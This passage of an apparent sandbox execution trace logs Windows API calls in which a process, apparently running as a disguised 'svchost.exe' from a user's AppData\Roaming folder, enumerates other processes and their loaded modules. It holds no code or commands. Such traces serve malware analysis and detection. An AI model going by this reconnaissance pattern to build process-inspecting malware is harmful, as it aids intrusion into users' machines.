(cb=0x804) returned 0xd910e0 [0071.467] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0071.471] CoTaskMemFree (pv=0xd910e0) [0071.471] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x25081d0, cb=0x18 | out: lpmodinfo=0x25081d0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0071.475] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.475] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0071.480] CoTaskMemFree (pv=0xd910e0) [0071.480] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.480] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0071.485] CoTaskMemFree (pv=0xd910e0) [0071.485] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb00000, lpmodinfo=0x250a7a8, cb=0x18 | out: lpmodinfo=0x250a7a8*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0071.489] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.489] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0071.494] CoTaskMemFree (pv=0xd910e0) [0071.494] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.495] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0071.499] CoTaskMemFree (pv=0xd910e0) [0071.499] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb330000, lpmodinfo=0x250c968, cb=0x18 | out: lpmodinfo=0x250c968*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0071.503] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.503] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb330000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0071.508] CoTaskMemFree (pv=0xd910e0) [0071.508] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.508] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb330000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0071.512] CoTaskMemFree (pv=0xd910e0) [0071.512] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3790000, lpmodinfo=0x250eb28, cb=0x18 | out: lpmodinfo=0x250eb28*(lpBaseOfDll=0x7fef3790000, SizeOfImage=0xbd000, EntryPoint=0x7fef3799a9c)) returned 1 [0071.517] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.517] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3790000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="win32spl.dll") returned 0xc [0071.521] CoTaskMemFree (pv=0xd910e0) [0071.521] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.521] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3790000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\win32spl.dll" (normalized: "c:\\windows\\system32\\win32spl.dll")) returned 0x20 [0071.526] CoTaskMemFree (pv=0xd910e0) [0071.526] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3760000, lpmodinfo=0x2510cf8, cb=0x18 | out: lpmodinfo=0x2510cf8*(lpBaseOfDll=0x7fef3760000, SizeOfImage=0x2d000, EntryPoint=0x7fef376136c)) returned 1 [0071.531] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.531] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="inetpp.dll") returned 0xa [0071.535] CoTaskMemFree (pv=0xd910e0) [0071.535] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.535] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\inetpp.dll" (normalized: "c:\\windows\\system32\\inetpp.dll")) returned 0x1e [0071.540] CoTaskMemFree (pv=0xd910e0) [0071.540] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb40000, lpmodinfo=0x2512eb8, cb=0x18 | out: lpmodinfo=0x2512eb8*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0071.545] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.545] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVRTL.dll") returned 0xa [0071.549] CoTaskMemFree (pv=0xd910e0) [0071.549] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.549] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DEVRTL.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0071.554] CoTaskMemFree (pv=0xd910e0) [0071.554] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb60000, lpmodinfo=0x2515078, cb=0x18 | out: lpmodinfo=0x2515078*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0071.559] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.559] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0071.564] CoTaskMemFree (pv=0xd910e0) [0071.564] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.564] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0071.569] CoTaskMemFree (pv=0xd910e0) [0071.569] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x2517250, cb=0x18 | out: lpmodinfo=0x2517250*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0071.573] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.574] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0071.578] CoTaskMemFree (pv=0xd910e0) [0071.578] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.578] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0071.583] CoTaskMemFree (pv=0xd910e0) [0071.583] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2519410, cb=0x18 | out: lpmodinfo=0x2519410*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0071.588] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.588] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0071.593] CoTaskMemFree (pv=0xd910e0) [0071.593] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.593] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0071.598] CoTaskMemFree (pv=0xd910e0) [0071.598] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x251b5d0, cb=0x18 | out: lpmodinfo=0x251b5d0*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0071.602] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.602] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0071.608] CoTaskMemFree (pv=0xd910e0) [0071.608] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.608] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0071.613] CoTaskMemFree (pv=0xd910e0) [0071.613] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb0e0000, lpmodinfo=0x251d790, cb=0x18 | out: lpmodinfo=0x251d790*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0071.618] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.618] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0071.623] CoTaskMemFree (pv=0xd910e0) [0071.623] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.623] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb0e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0071.628] CoTaskMemFree (pv=0xd910e0) [0071.628] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x251f950, cb=0x18 | out: lpmodinfo=0x251f950*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0071.633] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.633] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0071.638] CoTaskMemFree (pv=0xd910e0) [0071.638] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.638] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0071.643] CoTaskMemFree (pv=0xd910e0) [0071.643] CloseHandle (hObject=0x214) returned 1 [0071.652] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0071.652] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x848) returned 0x214 [0071.652] EnumProcessModules (in: hProcess=0x214, lphModule=0x2523898, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2523898, lpcbNeeded=0x23ee40) returned 1 [0071.653] GetModuleInformation (in: hProcess=0x214, hModule=0xf40000, lpmodinfo=0x2523b08, cb=0x18 | out: lpmodinfo=0x2523b08*(lpBaseOfDll=0xf40000, SizeOfImage=0x17000, EntryPoint=0xf414a1)) returned 1 [0071.653] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.653] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xf40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="active-charge.exe") returned 0x11 [0071.654] CoTaskMemFree (pv=0xd910e0) [0071.654] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.654] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xf40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\active-charge.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\active-charge.exe")) returned 0x38 [0071.654] CoTaskMemFree (pv=0xd910e0) [0071.654] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2525d48, cb=0x18 | out: lpmodinfo=0x2525d48*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0071.655] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.655] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0071.655] CoTaskMemFree (pv=0xd910e0) [0071.655] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.655] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0071.656] CoTaskMemFree (pv=0xd910e0) [0071.656] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2527f08, cb=0x18 | out: lpmodinfo=0x2527f08*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0071.656] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.656] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0071.657] CoTaskMemFree (pv=0xd910e0) [0071.657] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.657] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0071.657] CoTaskMemFree (pv=0xd910e0) [0071.657] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x252a0c8, cb=0x18 | out: lpmodinfo=0x252a0c8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0071.658] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.658] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0071.658] CoTaskMemFree (pv=0xd910e0) [0071.658] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.658] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0071.659] CoTaskMemFree (pv=0xd910e0) [0071.659] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x252c298, cb=0x18 | out: lpmodinfo=0x252c298*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0071.659] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.659] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0071.660] CoTaskMemFree (pv=0xd910e0) [0071.660] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.660] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0071.661] CoTaskMemFree (pv=0xd910e0) [0071.661] CloseHandle (hObject=0x214) returned 1 [0071.661] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0071.661] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x214 [0071.661] EnumProcessModules (in: hProcess=0x214, lphModule=0x252e9b8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x252e9b8, lpcbNeeded=0x23ee40) returned 1 [0071.662] GetModuleInformation (in: hProcess=0x214, hModule=0x1190000, lpmodinfo=0x252ec28, cb=0x18 | out: lpmodinfo=0x252ec28*(lpBaseOfDll=0x1190000, SizeOfImage=0x17000, EntryPoint=0x11914a1)) returned 1 [0071.662] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.662] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1190000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="omnipos.exe") returned 0xb [0071.662] CoTaskMemFree (pv=0xd910e0) [0071.663] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.663] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1190000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\MSBuild\\omnipos.exe" (normalized: "c:\\program files (x86)\\msbuild\\omnipos.exe")) returned 0x2a [0071.663] CoTaskMemFree (pv=0xd910e0) [0071.663] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2530e38, cb=0x18 | out: lpmodinfo=0x2530e38*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0071.663] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.663] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0071.664] CoTaskMemFree (pv=0xd910e0) [0071.664] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.664] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0071.664] CoTaskMemFree (pv=0xd910e0) [0071.664] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2532ff8, cb=0x18 | out: lpmodinfo=0x2532ff8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0071.664] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.665] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0071.665] CoTaskMemFree (pv=0xd910e0) [0071.665] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.665] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0071.665] CoTaskMemFree (pv=0xd910e0) [0071.665] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25351d0, cb=0x18 | out: lpmodinfo=0x25351d0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0071.666] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.666] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0071.666] CoTaskMemFree (pv=0xd910e0) [0071.666] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.666] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0071.667] CoTaskMemFree (pv=0xd910e0) [0071.667] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25373a0, cb=0x18 | out: lpmodinfo=0x25373a0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0071.668] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.668] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0071.668] CoTaskMemFree (pv=0xd910e0) [0071.668] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.668] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0071.669] CoTaskMemFree (pv=0xd910e0) [0071.669] CloseHandle (hObject=0x214) returned 1 [0071.669] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0071.670] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d0) returned 0x214 [0071.670] EnumProcessModules (in: hProcess=0x214, lphModule=0x2539ac0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2539ac0, lpcbNeeded=0x23ee40) returned 1 [0071.670] GetModuleInformation (in: hProcess=0x214, hModule=0xa40000, lpmodinfo=0x2539d30, cb=0x18 | out: lpmodinfo=0x2539d30*(lpBaseOfDll=0xa40000, SizeOfImage=0x17000, EntryPoint=0xa414a1)) returned 1 [0071.671] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.671] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xa40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="beat.exe") returned 0x8 [0071.671] CoTaskMemFree (pv=0xd910e0) [0071.671] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.671] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xa40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\beat.exe" (normalized: "c:\\program files\\windowspowershell\\beat.exe")) returned 0x2b [0071.671] CoTaskMemFree (pv=0xd910e0) [0071.671] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x253bf40, cb=0x18 | out: lpmodinfo=0x253bf40*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0071.672] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.672] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0071.672] CoTaskMemFree (pv=0xd910e0) [0071.672] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.672] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0071.673] CoTaskMemFree (pv=0xd910e0) [0071.673] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x253e100, cb=0x18 | out: lpmodinfo=0x253e100*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0071.673] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.673] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0071.674] CoTaskMemFree (pv=0xd910e0) [0071.674] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.674] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0071.674] CoTaskMemFree (pv=0xd910e0) [0071.674] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25402c0, cb=0x18 | out: lpmodinfo=0x25402c0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0071.675] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.675] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0071.675] CoTaskMemFree (pv=0xd910e0) [0071.675] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.675] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0071.676] CoTaskMemFree (pv=0xd910e0) [0071.676] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2542490, cb=0x18 | out: lpmodinfo=0x2542490*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0071.676] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.676] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0071.677] CoTaskMemFree (pv=0xd910e0) [0071.677] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.677] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0071.677] CoTaskMemFree (pv=0xd910e0) [0071.678] CloseHandle (hObject=0x214) returned 1 [0071.678] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0071.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x214 [0071.678] EnumProcessModules (in: hProcess=0x214, lphModule=0x2544bb0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2544bb0, lpcbNeeded=0x23ee40) returned 1 [0071.679] GetModuleInformation (in: hProcess=0x214, hModule=0xec0000, lpmodinfo=0x2544e20, cb=0x18 | out: lpmodinfo=0x2544e20*(lpBaseOfDll=0xec0000, SizeOfImage=0x17000, EntryPoint=0xec14a1)) returned 1 [0071.679] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.679] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xec0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="flashfxp.exe") returned 0xc [0071.679] CoTaskMemFree (pv=0xd910e0) [0071.679] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.679] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xec0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Defender\\flashfxp.exe" (normalized: "c:\\program files\\windows defender\\flashfxp.exe")) returned 0x2e [0071.680] CoTaskMemFree (pv=0xd910e0) [0071.680] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2547040, cb=0x18 | out: lpmodinfo=0x2547040*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0071.680] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.680] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0071.681] CoTaskMemFree (pv=0xd910e0) [0071.681] CoTaskMemAlloc 